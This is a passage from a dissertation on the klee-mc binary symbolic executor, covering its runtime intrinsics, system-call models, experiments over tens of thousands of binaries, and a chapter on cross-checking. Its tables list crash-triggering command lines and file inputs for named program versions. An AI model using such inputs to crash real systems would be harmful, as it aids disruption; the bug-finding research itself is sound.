any interface. There are two general guiding principles that worked in practice. First,
a good intrinsic is primitive in that it exposes functionality that cannot be replicated
with library code. Second, since the executor implementation is non-preemptible, a
good intrinsic should complete in a reasonable amount of time. Often this reasonable
time constraint implies that calling an intrinsic should execute at most one solver call.
An example bad intrinsic is klee ’smalloc call. The malloc intrinsic allocates sbytes
of memory, which requires executor assistance, but also lets sbe symbolic, issuing
several solver calls in the executor context (poorly, noting “just pick a size” in the
comments) which could otherwise be handled by runtime code. klee-mc instead has
an interpreter intrinsic malloc fixed , which allocates a constant number of bytes
and uses 5×fewer lines of code, called by a library intrinsic malloc that forks on
symbolic allocation sizes.
Table 2.2 lists some of the more interesting new intrinsics used by klee-mc . None
of these intrinsics inherently reason about machine code, hence the klee prefix, but
were still integral to klee-mc to build library intrinsics (Figure 2.4 gives an exam-
ple). Many of these intrinsics rely on a predicate pargument; these predicates are
constructed explicitly with the mkexpr intrinsic. Although instruction evaluation
implicitly builds expressions, the mkexpr intrinsic is useful for avoiding compiler
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 35
Intrinsic Call Description
klee mkexpr (op,x,y,z )Make anop-type expression with terms x,y,z
klee feasible (p) Return true when pis satisfiable
klee prefer (p) Branch onp, preferring true path when feasible
klee get value pred (e,p)Get concrete value of eassuming predicate p
klee report (t) Create test case without terminating state
klee indirectn(s,...) Call intrinsic swithnarguments
klee read reg(s) Return value for executor resource s
Table 2.2: Selected interpreter intrinsic extensions for runtime libraries.
optimizations (i.e., branch insertion) that might cause unintended forking or to avoid
forking entirely (i.e., if-then-else expressions). The feasible intrinsic tests whether
a predicate pis feasible; prior to introducing this intrinsic, runtime code could branch
onp, thus collapsing pto either true or false. Likewise, prior to get value pred
runtime code could not get a concretization of ewithout adding pto the state’s con-
straint set. Both indirectnandread regdecouple guest code from the executor;
indirect lets machine code late-bind calls to intrinsics, useful for unit tests, and
read reglets runtime code query the executor for configuration information, an
improvement over klee ’s brittle method of scanning a library’s variable names at
initialization and replacing values.
Library Intrinsics
Whereas interpreter intrinsics expose primitive functionality through a special execu-
tor interface, library intrinsics provide richer operations with runtime code. Library
intrinsics may be thought of the “standard library” for the symbolic executor run-
time; runtime code can independently reproduce library intrinsic functionality but is
better off reusing the code already available. Furthermore, following the guidelines
for interpreter intrinsics, library intrinsics define features that could conceivably be
an interpreter intrinsic, but would otherwise be too costly or difficult to implement
directly in the executor.
Library intrinsics primarily assist symbolic execution by managing symbolic data
when multiple solver calls are needed. Two examples are the klee max value and
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 36
int klee get values pred (
uint64 texpr , uint64 t∗buf ,
unsigned n ,uint64 tpred )
{unsigned i ;
for ( i = 0 ; i <n ; i++){
/∗e x i t i f a l l v a l u e s t h a t s a t i s f y ’ pred ’ are exhausted ∗/
i f( ! klee feasible ( pred ) ) break ;
/∗g e t next value t h a t s a t i s f i e s ’ pred ’ ∗/
buf [ i ] = klee get value pred ( expr , pred ) ;
/∗remove current value from p o s s i b l e s a t i s f y i n g v a l u e s ∗/
pred = klee mk and ( pred , klee mk ne ( expr , buf [ i ] ) ) ;
}
return i ;}
Figure 2.4: A library intrinsic to enumerate predicated values
klee fork all nintrinsics. The first computes the maximum concrete value for
an expression with binary search driven by solver calls with klee feasible . The
second forks up to nstates by looping, making a solver call to get a concrete value
cfor an expression eand forking off a new state where cequalse. Additionally,
runtime code can take on a support role for interpreter intrinsics, such as in the case
ofmalloc : the library intrinsic processes any symbolic sizes then passes a simpler
case with concrete inputs to an interpreter intrinsic.
As a concrete example for how interpreter intrinsics and library intrinsics interact,
Figure 2.4 lists the library intrinsic klee get values pred . This function (used
in Section 6.4.1’s itepolicy) enumerates up to nfeasible and distinct values of expr
may take assuming the calling state’s path constraints and an initial predicate pred ,
storing the results in buf. As the function loops, it issues a solver call testing whether
the predicate is satisfiable (using klee feasible ). issues another solver call
through klee get value pred to get a value cforexpr , then adds a condition
to the predicate that the next value cannot be c(using klee mkexpr convenience
macros klee mkandand klee mkne). The function returns once all values for
expr are exhausted or nvalues are computed, which ever comes first. By carefully
intrinsic design, this potentially long-running function is preemptible by other states
and never forks or accrues additional state constraints.
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 37
Intermediate Code Intrinsics
Intermediate representations can lack appropriate expressiveness to succinctly de-
scribe complex code semantics. For instance, LLVM presently has 81 platform inde-
pendent intrinsics that describe variable arguments, garbage collection, stack manage-
ment, bulk memory operations, and so forth that are not part of the LLVM machine
description. Often such intrinsics affect program state and must be handled to cor-
rectly execute the program.
Like LLVM, the VEX intermediate representation has its own set of “helper”
intrinsics. When VEX translates machine code to VEX IR, it emits helper calls
to handle the more complicated instructions. These helpers compute the value of
theeflags register, count bits, and dispatch special instructions such as cpuid and
in/out . Helper calls depend on a sizeable architecture-dependent helper library (2829
lines for x86-64) that performs the computation instead of inlining the relevant code.
klee-mc has a copy of this library compiled as LLVM bitcode. DBT basic blocks
call into this runtime library like any other LLVM code.
System Models
A system model library supplies an interface between the guest program and the
symbolic executor that simulates the guest’s platform. The modeled platform can
range from emulated libc and POSIX calls to a simulated low-level operating system
call interface; klee-mc ’s system model replaces system call side effects with symbolic
data. Specialized knowledge of platform semantics encoded in a system model library
defines when and where a state takes on symbolic inputs.
Due to the variability of system libraries, modeling the binary program platform at
the system call level handles the most programs with the least effort. Although there
are opportunities for higher-level optimizations and insights into program behavior
by modeling system libraries instead of system calls, a binary program is nevertheless
free to make system calls on its own, necessitating a system call interface regardless.
Furthermore, since binary programs initiate reading input through system calls, mod-
eling inputs only through system calls is a natural cut. Finally, a model based on
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 38
system calls yields test cases that are system call traces, making the executor appear
from a testing view as an especially violent operating system.
The system model is a small symbolically executed runtime library which describes
system call side effects. When the target program issues a system call, the executor
vectors control to the model library, which marks the side effects with symbolic data.
The model uses interpreter intrinsics to update state properties (e.g., new mappings
formmap ) and to impose additional constraints on symbolic side effects. Variable
assignments for this symbolic data form test cases to reproduce program paths.
The system model in klee-mc can emulate Linux and Windows. The Linux
model supports both 64-bit programs (x86-64) and 32-bit programs (x86, ARM) in
the same code by carefully assigning structure sizes based on the architecture bit-
width. The x86 Windows model is less developed than the Linux model, primarily
due to system call complexity, but is interesting from a portability standpoint (the
problem of correctly modeling an operating system is investigated in Section 3.3.2).
For most system calls, the guest program passes in some buffer, the model marks it
symbolic, then control returns to the program. For calls that do not write to a buffer,
but return some value, the model marks the return value as symbolic.
Both models attempt to overapproximate known system calls. When marking
a buffer of memory passed to through a system call as symbolic, the model will
occasionally permit values which disagree with expected operating system values. For
instance, reads to the same position in a symbolic file will return different symbolic
data, flags can be set to invalid combinations, and system times may go backwards.
The system will not overapproximate when it can lead to an obvious buffer overrun,
such as giving an element count that exceeds a buffer or returning a string without a
nul terminator.
Function Hooks
Instrumenting calls to functions with runtime libraries gives the executor new drop-in
program analysis features. klee-mc ’s function hook support lets the user define a list
of bitcode libraries to load on start up that will intercept calls to arbitrary functions
within a state’s symbolic context. In practice, Section 6.4.2 extensively uses function
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 39
void hookpre GI assert fail (void∗regs )
{klee uerror ( ( const char∗)GET ARG0( regs ) , ” u a s s e r t . e r r ” ) ; }
void hookpre GIexit ( void∗regs ){e x i t (GET ARG0( regs ) ) ; }
Figure 2.5: Function entry hooks for process exit functions
hooks to instrument libc memory heap functions such as malloc andfree .
The function hook facility dynamically loads bitcode libraries, as given by a com-
mand line argument, which define function code to be called before entering and
exiting specific functions. The loader uses the library’s function names to deter-
mine which functions to instrument and where to put the instrumentation; functions
named hookprefare called whenever a state enters fand functions named
hookpost fare called whenever a state leaves f. When the function fis loaded
intoklee-mc , the calls to all relevant hook functions are inserted into f’s code to
ensure the hooks are called on entry and exit.
As an example, Figure 2.5 shows two example function hooks. The functions in-
tercept every entry to glibc ’s internal GIassert fail (called on an assertion
failure) and GIexit (called on normal termination) functions. The library func-
tions indicate the program intends to exit following some cleanup code. Instead of
running this cleanup code, the function hooks immediately terminate the calling state
with the failed assert producing an error report and the exit producing a normal test,
saving the executor unnecessary computation.
2.4.6 Limitations
As with any research system, klee-mc has some limitations. These limitations re-
flect intentional omissions to simplify the system in the interest of expediency and
tractability rather than serious architectural deficiencies. Although the lack of certain
features inhibits the analysis of select programs, there are no strict reasons prohibiting
the support in the future.
First, klee-mc lacks support for signals and threads. Bugs caused by signals and
threads tend to be difficult to reproduce (and hence unconvincing without significant
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 40
manual inspection), the symbolic execution overhead can be expensive, and there
are plenty of deterministic bugs already. Currently, the system will register signal
handlers, but never trigger any signals. Similarly, the system immediately fails any
thread-related system calls. However, there is partial support for threads based on
selecting a single thread context from a snapshot to symbolically execute.
The system model does not perfectly simulate its target platform. In most cases,
the system model can ignore specific environment details (e.g., timers, system in-
formation, users and groups, capabilities) by overapproximating with unconstrained
symbolic data. However, system calls such as ioctl rely on program and device-
specific context to define the precise interface; the system model does not know
which arguments are buffers that can be marked symbolic. Ultimately, this leads
to an underapproximation of the operating system which can reduce overall program
coverage.
Programs with large memory footprints, such as browsers, office suites, and media
editors, severely strain klee-mc ’s memory system. Large programs do run under
klee-mc but do not run very well. When a program uses over a hundred thousand
pages, the address space structure rapidly becomes inefficient since it tracks each page
as a separate object. Large programs often also have large working sets, making forked
states, even when copy-on-write, cause considerable memory pressure. Conceivably,
better data structures and state write-out to disk would resolve this issue.
Supervisor resources, those that require kernel-level privileges, and devices, are
not supported. While these features necessary to run operating systems, hypervisors,
and other software that must run close to the hardware, which are interesting in
their own right, klee-mc focuses only on user-level programs. The symbolic execu-
tor could certainly model supervisor resources and devices (and some do), but the
limited amount of software that uses these features, the difficulty of modeling ob-
scure hardware quirks, and analysis necessary to efficiently support device interrupts,
makes such a platform too specialized to pursue in the short term.
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 41
Collection Platform Programs Failure Success
CyanogenMod 10.1.2 ARM Linux 147 0 147 (100%)
RaspberryPI 1.3 ARM Linux 3026 528 2498 (83%)
Fedora 19 x86 Linux 12415 2713 9702 (78%)
Fedora 20 x86-64 Linux 12806 1075 11731 (92%)
Ubuntu 13.10 x86-64 Linux 15380 1222 14158 (92%)
Ubuntu 14.04 x86-64 Linux 13883 992 12891 (93%)
Windows Malware x86 Windows 1887 289 1598 (85%)
Total 59544 6819 52725 (89%)
Table 2.3: Snapshot counts for binary program collections
2.5 Experiments
This section demonstrates the characteristics of a single run of klee-mc ’s binary
symbolic execution over thousands of programs taken from three architectures (ARM,
x86, x86-64), representing experimental data taken over approximately the course
of a year. Linux binaries were collected from Fedora, Ubuntu, RaspberryPI, and
CyanogenMod distributions. Windows binaries were collected from several malware
aggregation sites. We highlight noticeable properties concerning key aspects of the
system when working with bulk program sets, including snapshotting, testing, and
coverage.
2.5.1 Snapshots
Snapshots let the executor easily load a program by using the program’s host platform
to set up the entire process image. To take a snapshot, it must be possible to run the
program; this is not always the case. Table 2.3 lists the success rates for snapshotting
programs by each named collection or distribution and shows simply launching a
program can be challenging.
Up to 17% of programs for each collection failed to snapshot. For x86 and x86-64
Linux, many binaries had dependencies that were difficult to resolve. Some binaries
would fail when linked against libraries with the correct versions but wrong linkage
flags; we set up several LDPATH s and cycled through them in case one would launch
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 42
 0.1 1 10 100 1000
x86-64 x86 ARM WindowsGigabytes
Snapshot CollectionMemory Segment Storage Utilization
Virtual
Physical
Unshared
Figure 2.6: Snapshot storage overhead before and after deduplication
the binary. For ARM Linux, there were several runtime linkers, linux-rtld , with
the same name but slightly different functionality; using the wrong linker would
crash the program. Normally, only one linker and its associated set of binaries would
be installed to the system at a time. To support multiple linkers on the same ARM
system at once, each linker was assigned a unique path and each binary’s linker string
was rewritten, cycling through linkers until the binary would launch. For Windows,
programs were launched in a virtual machine, but the binaries were often compressed
with runtime packers, making it difficult to extract and run the actual program.
Although snapshots are larger than regular binaries, the design can exploit shared
data, making them space efficient. Figure 2.6 shows storage overhead for the system’s
snapshots in logarithmic scale. Every snapshot memory region is named by hash and
saved to a centralized area; regions for individual snapshots point to this centralized
store with symlinks. The figure shows physical storage usage, which is roughly half
unshared and shared data. The virtual data is the amount of storage that would be
used if all shared data were duplicated for every snapshot. In total, deduplicating
shared data gives a 4.9 ×reduction in overhead, amounting in 696 gigabytes of savings.
Furthermore, this shared structure helps reduce overhead on single binaries when
snapshot sequencing for system model differencing ( §3.3.2).
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 43
1e+041e+051e+061e+071e+08
x86-64 x86 ARM        Windows# Paths
Snapshot PlatformPaths and Tests Cases from Symbolic Execution
Partial Paths
Concrete TestsComplete Paths
Figure 2.7: Test cases and paths found during mass testing
2.5.2 Program Tests and Bugs
At its core, klee-mc produces tests for programs. To find tests, programs were
symbolically executed for five minutes a piece. All programs were tested beginning at
their entry point with symbolic command line arguments and totally symbolic files.
Figure 2.7 shows the mass checking test case results for all programs from Ta-
ble 2.3. In total, the executor partially explored 24 million program paths and pro-
duced 1.8 million test cases. Only a fraction of all paths become test cases; it is
still unclear how to generally select the best paths to explore. We distinguish be-
tween complete paths, a test that runs to full completion, and concrete tests, a test
which may have concretized its symbolic state early; 14% of test cases were con-
cretized, demonstrating the usefulness of state concretization and the importance
graceful solver failure recovery.
Of course, finding bugs is a primary motivation to testing programs. Figure 2.8
shows the total errors found for each tested platform. By generating over a million test
cases for the programs, we were able to find over ten thousand memory access faults
(pointer errors) and over a thousand other faults (divide by zero and jumps to invalid
code). Divide by zero errors were the rarest faults, possibly on account of divisions
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 44
 10 100 1000 10000 100000
x86-64 x86 ARM        Windows# Errors
Snapshot PlatformProgram Errors from Symbolic Execution
Jump/Decode Error
Div0 ErrorPointer Error
Syscall Error
Figure 2.8: Bugs found during mass testing
being less frequent than memory accesses and indirect jumps. Likewise, hundreds of
tests ran into unsupported system calls (syscall errors), demonstrating the system’s
ability to detect some of its own corner cases. We also include the Window’s results to
show the effects of a prototype model; the vast number of pointer errors indicates the
heightened sensitivity Windows programs have toward unrealistic system call results.
The tests from klee-mc which trigger bugs certainly appear machine-generated.
Some of the more human-readable bugs are shown in Table 2.4. These bugs are in-
teresting symbolically derived command line inputs which cause a given program to
crash, mostly due to string handling bugs. Of particular note, dcallocates a string
with−1 characters. Surprisingly, many programs seem to crash with no arguments,
either because they always expect arguments or because they always assume some
(missing) file is present. Table 2.5 lists a few (less readable) bugs detected through
symbolically derived input files. The file data is given as a hex dump taken from od
program; the hexadecimal address on the left represents the file offset, the byte values
follow, and *indicates the last line’s data repeats until the next offset. These bugs
tend to be deeper than command line bugs since files are subject to more processing
than command line strings: strings intelligently detects but crashes analyzing a mal-
formed “srec” file, mp4info accesses an out-of-bound metadata property, ocamlrun
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 45
Program Arguments
cclambda --ran .
dc --e=[
h5stat --ob
pmake !=\xb\x1$\x0\n\x1\x1
tao loadmonitor ’\n "’ ’\t’
transqt2 -f\x1\x1 .
ttfdump ttc
vgrep x\’-/
xrootd --bbbbc\”
Table 2.4: Selected command lines triggering memory access faults
reads missing section descriptors, and fsck.ext2 attempts to fill out a buffer using
a negative length.
2.5.3 Coverage
Test counts tells little about how much distinct program behavior is exercised by the
executor. For instance, a string comparison of length nwill generate ntest cases but
each test case exercises the same code paths. The total amount of unique machine
code covered and the types of system calls exercised, however, give a crude measure
of code and path variety across all programs.
Table 2.6 lists basic blocks and absolute code covered. The data is divided into
a unique classification, counting the same string of code for a basic block only once
(measuring diversity), and a total classification, counting the same string of code for
every program where it was covered (measuring total coverage). Although there’s
a high degree of code sharing among programs, the klee-mc system still processes
hundreds of megabytes of unique code on account of easily handling large program sets
across several platforms. Of these platforms, one interesting aspect is the particularly
high rate of code sharing for Windows; this is likely due to programs spending most
of their time in the user interface libraries.
The system model can reduce code coverage if it does not accurately model its
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 46
Program File Input
strings-2.240000 53 32 30 30
0004 00 00 00 00
*
1000
mp4info-2.0.00000 01 00 00 82
0004 63 74 74 73
0008 00 00 00 00
000c 40 00 00 00
0010 00 00 00 00
*
1fff 00 00 00
ocamlrun-4.01.00000 20 00 00 00
0004 43 61 6d 6c
0008 31 39 39 39
000c 58 30 30 38Program File Input
fsck.ext2-1.42.100000 00 00 00 00
*
0400 99 ef 1b 08
0404 01 80 c5 0f
0408 00 00 00 00
*
0418 06 00 00 00
041c 14 00 00 00
0420 00 40 00 00
0424 01 00 dc f3
0428 cf f4 d1 46
042c 00 00 00 00
*
0438 53 ef 00 00
043c 00 00 00 00
*
0460 10 00 00 00
0464 00 02 00 00
0468 00 00 00 00
*
0504 a5 9f 00 04
0508 00 00 00 00
*
0800
Table 2.5: Selected file inputs triggering memory access faults
Platform Basic Blocks Machine Code
Unique Total Unique Total
x86-64 Linux 7,498,415 82,724,878 210MB 1517MB
x86 Linux 2,304,809 24,016,450 55MB 406MB
ARM Linux 450,340 5,679,779 8.4MB 104MB
x86 Windows 89,494 2,326,051 1.2MB 32MB
Table 2.6: Amount of machine code covered by klee-mc
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 47
 1 10 100 1000 10000
 50  100  150  200  250Number of Programs
System Calls Sorted By FrequencySystem Call Frequency
x86-64
x86
ARM
Windows
Figure 2.9: Observed system call frequency over all programs
target platform. However, if a system call is used by only a few programs, the qual-
ity of its implementation has little impact on overall coverage. Figure 2.9 shows
system calls sorted by total number of programs where they were used. The linear
drop-off of calls on the logarithmic scale indicates system call usage follows an expo-
nential distribution, suggesting focusing effort on more popular system calls would
be a good choice. The most common calls for Windows were NtUserCallOneParam ,
a unified and complex interface for dozens of User32 system calls (modeled poorly),
and NtUserWaitMessage , a call that suspends a thread until it receives a message
(modeled easily). The most common calls for Linux were exit group ,write , and
mmap , which are all modeled accurately. For the long tail, 20 (ARM, Windows), 28
(x86-64), and 48 (x86) calls were only used by a single program.
2.6 Conclusions
This chapter provided a context for symbolic execution and described the design of
klee-mc . The details to the changes necessary to support machine code programs
served as a convenient tour of core system components. Although klee-mc can
analyze huge program sets, finding thousands of unique program faults, the additional
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 48
system complexity suggests robustness and correctness are paramount when analyzing
machine code, which will remain a focus throughout the rest of this dissertation.
Chapter 3
Machine Cross-Checking
3.1 Introduction
The ease of applying dynamic analysis to unmodified program binaries spurred the
development of binary symbolic execution. A binary symbolic executor symbolically
evaluates compiled executables as-is; there is no need for recompilation, annotations,
or special linking. This contrasts with systems [28, 58, 75, 119] built to process source
code or a metadata-rich byte code. A typical system pairs a symbolic interpreter
with a dynamic binary translation (DBT) front-end [30, 34, 59, 92, 96, 124]; the DBT
converts a program’s machine code into instructions for the symbolic interpreter.
However, this convenience comes at the cost of complexity. The executor must
support broad classes of machine code programs to be generally useful. While the
system should closely match the target program as it behaves on hardware, mere
inspection is inadequate to confirm accurate execution; soundness demands near-
flawless interpretation. Few decisions are shallow: almost every result depends on a
long line of prior computations. Mistakes cause both false positives (which at least
can be seen and fixed) and, worse, invisible accumulation of false negatives as it
misses paths, corrupts constraints, and more. It is often difficult or impractical to
confirm these error reports by hand; instead, test cases serve as certificates against
false positives.
We built an ensemble of techniques to achieve bitwise equivalence to program
49
CHAPTER 3. MACHINE CROSS-CHECKING 50
evaluation on hardware with a dynamic binary symbolic executor. These techniques
include co-simulation against hardware, equivalence checking, side-effect analysis,
and hardware fall-backs. The process often compares unreliable data sources (cross-
checking) but correctness arises by working transitively down to physical hardware.
These automated checks proved invaluable when developing klee-mc . Impre-
cise approximations of the program environment are detected by comparing symbolic
execution traces against operating system side-effects. By checking test cases from
symbolic interpreter against an independent JIT interpreter, bugs in the stack which
impact execution can be detected near the point of failure in the guest program. The
JIT is further checked for execution discrepancies through bi-simulation with hard-
ware, ensuring the JIT’s intermediate results when transitioning from basic block to
basic block match hardware. Expression rewrite rules are verified offline for correct-
ness. End-to-end bugs in the expression builder in symbolic expression rewriting rules
are detected at the instruction level. Detailed diagnostic reports are given to the user
whenever execution accuracy becomes suspect.
The rest of this chapter is organized as follows. Section 3.2 discusses the moti-
vation for high-integrity binary symbolic execution. Section 3.3 describes the design
theklee-mc integrity checking features. Section 3.4 outlines specific implementa-
tion details behind the symbolic executor. Section 3.5 shows the results of checking
the symbolic execution system across the stack. Section 3.6 discusses related work.
Finally, Section 3.7 concludes.
3.2 Motivation
Binary symbolic execution closely matches the literal interpretation of a target pro-
gram as on hardware, an advantage over source-based methods, but at the expense of
clarity. Since paths become lengthy and obscured by machine semantics, the executor
must accurately symbolically evaluate the program and produce sound test cases– an
arduous task in light of the system’s complexity. Hence we reduce the problem to
automatically checking the symbolic executor piece by piece.
CHAPTER 3. MACHINE CROSS-CHECKING 51
Error Report
Error : bad memory a c c e s s !
{” address ” : ”
(ReadLSB w64
(Add w32 320 N0 : ( Extract w32 0 ( Shl w64
( SExt w64 ( Read w8 4621 read1 ) ) 3 ) ) )
const osa7 )”}
Stack : #1 in IO vfprintf internal+0x447d
#2 in printf chk+0xc8
#3 in 0x40160b
#4 in 0x40275d
#5 in libc start main+0xac
#6 in 0 x400e70
Test Replay
[  ̃ / ] $ kmc−replay 50
Replay : t e s t #50
[ . . . ]
[ kmc−replay ] Retired : sys=l s e e k . r e t=0x2000 .
[ kmc−replay ] Applying : sys=write
[ kmc−replay ] Couldn ’ t read s c l o g entry #13.
[  ̃ / ] $
Figure 3.1: A user’s limited perspective of a bad path.
3.2.1 Bad Paths
Whenever a program bug detection tool discovers an error, it is commenting on an
aspect of the program that will likely be unfamiliar to the user. If the error is spurious,
the issue is further compounded; tool code fails somewhere obscure when analyzing
an unusual program. Given a binary program lacking source code, this intermediate
computation becomes essentially opaque to human inspection.
Figure 3.1 presents one such baffling situation where an error report has an irre-
producible path, illustrating the difficulty of understanding symbolic execution false
positives. The symbolic executor tool reports a memory access error somewhere inside
printf on a symbolic address derived from a read system call. When the user tries
to review the test case (test 50) with the kmc-replay test replay utility, the test runs
out of system calls, landing on a write , instead of crashing. Presumably an illegal
memory access should have occurred after the last retired system call ( lseek ), before
CHAPTER 3. MACHINE CROSS-CHECKING 52
thewrite , and within printf . It is unclear what exactly went wrong or why, only
that the symbolic executor (or replay facility) is mistaken. Obviously, there must be
some software defect, whether in the target program or the executor; the challenge is
to determine the precise source of the problem.
3.2.2 System Complexity
Binary symbolic executors build from the principles of classical source-based symbolic
executors. Figure 3.2 highlights the important components of a binary symbolic
execution stack. These components must work perfectly in tandem to produce correct
test cases; a binary symbolic executor can fail at numerous points throughout the
stack. The goal of our work is to make these issues tractable. Other projects have
addressed some reliability concerns, but none have combined them under a single
system. In Section 3.6, we will compare klee-mc with this related work.
As given in Chapter 2, the basic process for symbolic execution is as follows. First,
the executor begins by loading a target program. A front-end processes the target
program into a simpler intermediate representation. An interpreter symbolically eval-
uates the intermediate representation by manipulating a mix of symbolic expressions
and concrete data. A state acquires symbolic data through simulated program envi-
ronment features defined by a custom system model. Evaluation forks new states on
feasibly contingent branches decided by a constraint solver; each state accrues path
constraints according to its sequence of branch decisions. When a state terminates,
the executor constructs a test case a variable assignment that satisfies the state’s path
constraints. Finally, replaying the test case reproduces the path.
The executor loads a target program similar to a native program loader. If loader
details diverge from the target system, code paths depending on runtime detected ar-
chitectural features will differ (e.g., string functions, bulk memory operations, codecs).
Unlike a traditional program loader, the executor may support seeded tests that begin
running long after the program entry point, necessitating point-in-time snapshots.
Every binary symbolic executor must handle machine code in its front-end but
machine code decoders are known to be unreliable [60, 92, 104]. Modern instruction
CHAPTER 3. MACHINE CROSS-CHECKING 53
Figure 3.2: A binary symbolic execution stack with multiple replay facilities.
sets are huge, complicated, and new instructions are continually being added; hard-
ware outpaces decoder software. Additionally, the interface between the decoder and
the symbolic executor’s intermediate representation adds another layer of unreliable
abstraction.
The underlying symbolic interpreter evaluates the target program’s instructions.
However, the interpreter can easily diverge from intended execution. It can mis-
apply instructions (e.g., vector instructions). It can apply bogus optimizations on
constraints. It can apply bogus optimizations on state data. It can fail to handle
difficult symbolic cases (e.g., memory dereference, floating-point).
A system environment model inserts symbolic data into the program state. A
model may reimplement libraries [28, 86, 116], simulate system calls [30], or emulate
hardware devices [45]. Regardless of abstraction, if the model misrepresents the
environment then the following path diverges from the set of feasible platform paths.
Like a traditional symbolic executor, klee-mc relies on specialized expression
and constraint solver optimizations for good performance ( §2.4.3). Expression opti-
mizations, such as strength-reductions and structural simplifications, are often hand-
written. Constraint solving is accelerated by light-weight query processing. The
executor may also rewrite expressions to be palatable to a particular solver imple-
mentation. Keeping data symbolic throughout execution means the consequences of
a broken optimization may not manifest until long after its application.
CHAPTER 3. MACHINE CROSS-CHECKING 54
Replaying a test case should reproduce its respective program path. For binary
programs, the replay mechanism can rely on the interpreter, a just-in-time compiler,
or hardware. Since test cases are generated by the interpreter, replaying through
other executors can expose inconsistencies. Furthermore, if the interpreter is non-
deterministic, the test case can fail to replay at all.
Fortunately, the constraint solver, target environment, and target hardware all
strengthen the system’s faithfulness to native execution. The constraint solver can
check the solver and expressions stacks. The target environment can test the system
model. The hardware can test the binary front-end and final test cases. Checking
the executor with these mechanisms improves the overall integrity of the system.
Furthermore, these components often help improve the robustness of the system such
that it can proceed in light of failures.
3.3 Cross-Checking in klee-mc
In this section we discuss the design and general strategy for improving the integrity
of the klee-mc binary symbolic executor.
3.3.1 Deterministic Executor Data
The executor’s integrity mechanisms primarily depend on two sources of data. First,
the executor needs realistic and deterministically reproducible guest states, given
by program snapshots ( §2.4.1) and extended to snapshot sequences for system call
side-effect cross-checking. Second, the executor deterministically reproduces various
intermediate path results for bi-simulation using register and system call logs.
Program Process Snapshots
As described in Section 2.4.1, a snapshot is the state of a process image taken from a
live system. The system snapshots a binary program by launching it as a process and
recording the resources with system debugging facilities (e.g., ptrace ). The symbolic
executor first loads a target program by its snapshot before symbolically executing
CHAPTER 3. MACHINE CROSS-CHECKING 55
its code. Snapshots eliminate side effects and non-determinism from new libraries,
different linkers, and address space randomization over multiple runs by persistently
storing an immutable copy of process resources.
Snapshot Structure. A snapshotting program (the snapshotter) saves a running
process’s image data to a directory.. Snapshot data is structured as a simple directory
tree of files representing resources loaded from the process. Three resources constitute
the core process image’s machine configuration:
•User Registers – the set of registers for each thread is stored in a thread direc-
tory. These registers include the stack pointer, program counter, floating-point
registers, and general purpose registers.
•System Registers – registers not directly accessible or modifiable by the pro-
gram but necessary for correct program execution (e.g., segment registers and
descriptor tables).
•Memory – all code and data in the process including libraries, heaps, and stacks.
Snapshot Sequences . Detecting system model differences relies on comparing
program traces from the host and the executor. We represent host program traces at
a system call granularity by recording sequences of snapshots. Snapshot sequences
are stored as snapshot pairs pivoted around system calls. A snapshot pair has a
pre-snapshot, taken immediately prior to a system call, and a post-snapshot, taken
immediately after a system call. We write snapshot pairs as tuples ( s,s∗) wheresis
the pre-snapshot and s∗is the post-snapshot. The machine configuration difference
fromstos∗is a system call side effect.
Although a snapshot may be taken at any point, only the moment immediately
preceding and following a system call give fundamentally distinct snapshots. The
executor only introduces symbolic data when dispatching system calls since all input
derives from system calls. This controlled introduction of symbolic data means a
snapshots′between system calls is equivalent to a snapshot simmediately following
the last system call because swill always eventually evaluate to s′due to snapshots
being totally concrete.
CHAPTER 3. MACHINE CROSS-CHECKING 56
Symbolic execution of a snapshot pair begins in the system call model. The pre-
empted system call from the pre-snapshot is processed by the symbolic system model,
symbolic data is created if necessary, the system call completes and the target pro-
gram code is symbolically executed. Assuming the symbolic system model subsumes
the operating system’s behavior, the post-snapshot is a concretized path of the pre-
snapshot system call through the model. A post-snapshot begins with no symbolic
data so symbolic execution should match native execution up to the next system call.
Test Case Logs
Recall from Section 2.3 that for every test case, the symbolic executor generates files
of concrete data suitable for reconstructing a program path. A concrete test case is a
variable assignment which satisfies the path constraints, computed by the solver. To
replay a test, the interpreter replaces all symbolic data with concrete test case data.
Native execution makes system model effects difficult to reproduce when replaying
the test data through the model code. The model cannot run directly in the target
program without additional support code; the model would have to intercept system
calls, use its own heap (e.g., use its own malloc ), and use special assembly trampoline
to reflect register updates. If the model runs outside the target program’s address
space, the system must monitor the model’s memory accesses for target addresses.
Regardless of where the model runs, there still must be controls for non-determinism,
such as precisely reproducing addresses for memory allocation must control.
To avoid any dependency on the model code during replay, the executor logs mod-
eled system call side effects in a test case log. In addition to maintaining model side
effect information, the test case log is a general purpose logging facility for traces
from the executor. This general purpose facility is useful for tracking state informa-
tion when debugging the system, such as monitoring memory addresses and stack
modifications. For automated interpreter integrity checking, which is this chapter’s
focus, the log records registers at basic block boundaries for cross-checking against
JIT-computed registers in Section 3.3.3.
Figure 3.3 illustrates the logging process during symbolic execution. Whenever
the executor dispatches a machine code basic block, the executor writes the register
CHAPTER 3. MACHINE CROSS-CHECKING 57
Figure 3.3: Building a test log during symbolic execution
set to the state’s log. Whenever the system model dispatches a system call, the
executor writes the side-effects to the state’s log. In the example, the system call
returns a symbolic value, so the return value register %rax has its concrete mask set
to 0 to indicate the register is symbolic. The executor chooses to follow the OKbranch,
implying %rax must be the concrete value 0; the %rax mask value reflects the register
is concrete. When the state terminates, the executor writes the log to the filesystem
along with the concrete test case variable assignments.
System Call Logging. The model code produces a concrete log of information
